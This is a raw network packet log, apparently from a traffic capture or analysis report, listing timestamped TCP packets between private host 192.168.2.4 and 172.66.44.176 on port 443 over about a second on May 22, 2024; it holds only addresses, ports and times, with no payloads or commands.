May 22, 2024 02:46:41.305068016 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.305082083 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.305387974 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.305455923 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.305974960 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.352116108 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.903582096 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.903676033 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.903736115 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.903806925 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.907298088 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.907382011 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.911042929 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.911143064 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.911155939 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.911226034 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.918611050 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.918694973 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.921535015 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.921607018 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.921621084 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.921678066 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.921710014 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.921773911 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.927510023 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.927576065 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.933474064 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.933554888 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.933568001 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.933640003 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.937971115 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.938071012 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.938083887 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.938147068 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.942483902 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.942583084 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.997353077 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.997488022 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:41.998650074 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.998727083 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.004596949 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.004662991 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.004694939 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.004745007 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.009931087 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.010000944 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.011928082 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.011991978 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.012006998 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.012054920 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.018673897 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.018733025 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.018743992 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.018795013 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.022162914 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.022227049 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.022234917 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.022280931 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.025768995 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.025840044 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.025851011 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.025896072 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.029922009 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.029979944 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.029989004 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.030036926 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.034073114 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.034141064 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.034149885 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.034198046 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.038032055 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.038100958 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.038117886 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.038162947 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.041738033 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.041798115 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.041806936 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.041857958 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.045418024 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.045474052 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.049175024 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.049233913 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.049247980 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.049257040 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.049278021 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.049341917 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.052634001 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.052700996 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.090706110 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.090815067 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.093319893 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.093417883 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.100729942 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.100810051 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.107347965 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.107384920 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.107419968 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.107434034 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.107450962 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.107481003 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.113226891 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.113290071 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.118643045 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.118710995 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.121119022 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.121195078 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.126831055 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.126904011 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.128395081 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.128463030 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.132991076 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.133064985 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.135227919 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.135288000 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.139270067 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.139334917 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.185642958 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.185725927 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.189893961 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.189975023 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.191044092 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.191112041 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.195399046 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.195466042 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.198925018 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.199002981 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.200668097 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.200731993 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.204189062 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.204260111 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.205672979 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.205745935 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.207237005 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.207309008 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.210251093 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.210309029 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.213224888 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.213277102 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.214651108 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.214709997 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.217381954 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.217448950 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.219935894 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.219995975 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.221203089 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.221263885 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.222409964 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.222465038 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.224828005 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.224893093 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.225994110 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.226053953 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.228259087 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.228324890 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.229331970 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.229387045 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.231422901 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.231478930 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.232481956 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.232533932 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.234519958 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.234586954 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.235455990 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.235510111 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.237330914 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.237390041 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.280139923 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.280208111 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.280947924 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.281004906 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.282521963 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.282576084 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.286200047 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.286210060 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.286231041 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.286256075 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.286303043 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.286313057 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.286358118 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.291002035 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.291021109 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.291066885 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.291074991 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.291110992 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.291786909 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.291837931 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.295902014 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.295926094 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.295977116 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.295984030 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.296017885 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.299315929 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.299340963 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.299520016 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.299526930 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.299582005 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.302930117 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.302953005 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.303020954 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.303028107 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.303076029 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.305547953 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.305572033 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.305629969 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.305636883 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.305675030 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.308383942 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.308402061 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.308485031 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.308492899 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.308532953 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.376519918 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.376543045 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.376744032 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.376754999 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.376802921 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.378809929 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.378827095 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.378894091 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.378901958 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.378945112 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.381795883 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.381814003 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.381872892 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.381880045 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.381922007 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.383701086 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.383718967 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.383780003 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.383785963 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.383826971 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.385571003 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.385587931 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.385651112 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.385658026 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.385696888 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.388214111 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.388232946 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.388266087 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.388290882 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.388298988 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.388336897 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.390177965 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.390196085 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.390252113 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.390259027 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.390299082 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.390994072 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.391051054 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.471038103 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.471086979 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.471282005 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.471318007 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.471371889 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.472084045 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.472161055 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.472183943 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.472232103 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.473623037 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.473640919 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.473706007 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.473735094 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.473781109 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.475975037 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.475991964 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.476057053 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.476087093 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.476136923 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.478010893 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.478029013 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.478094101 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.478125095 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.478188992 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.479021072 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.479047060 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.479085922 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.479098082 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.479130030 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.479154110 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.480113983 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.480142117 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.480223894 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.480235100 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.480259895 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.480283976 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.481909990 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.481929064 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.481983900 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.481997013 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.482037067 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.482763052 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.482819080 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.482825041 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.482836962 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.482867956 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.482891083 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.483858109 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.483882904 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.483925104 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.483935118 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.483961105 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.483983040 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.523565054 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.523700953 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.523736000 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.523787975 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.565732002 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.565824032 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.566474915 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.566525936 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.566566944 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.566581964 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.566612959 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.566636086 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.567506075 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.567575932 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.567588091 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.567631960 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.568738937 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.568808079 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.568826914 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.568867922 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.569737911 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.569781065 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.569798946 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.569860935 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.569878101 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.569914103 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.569938898 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.570714951 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.570791960 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.570810080 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.570857048 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.571695089 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.571743011 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.571783066 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.571793079 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.571836948 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.572674036 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.572745085 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.572757959 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.572801113 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.573432922 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.573462009 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.573498964 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.573508978 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.573542118 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.573565960 CEST	49732	443	192.168.2.4	172.66.44.176
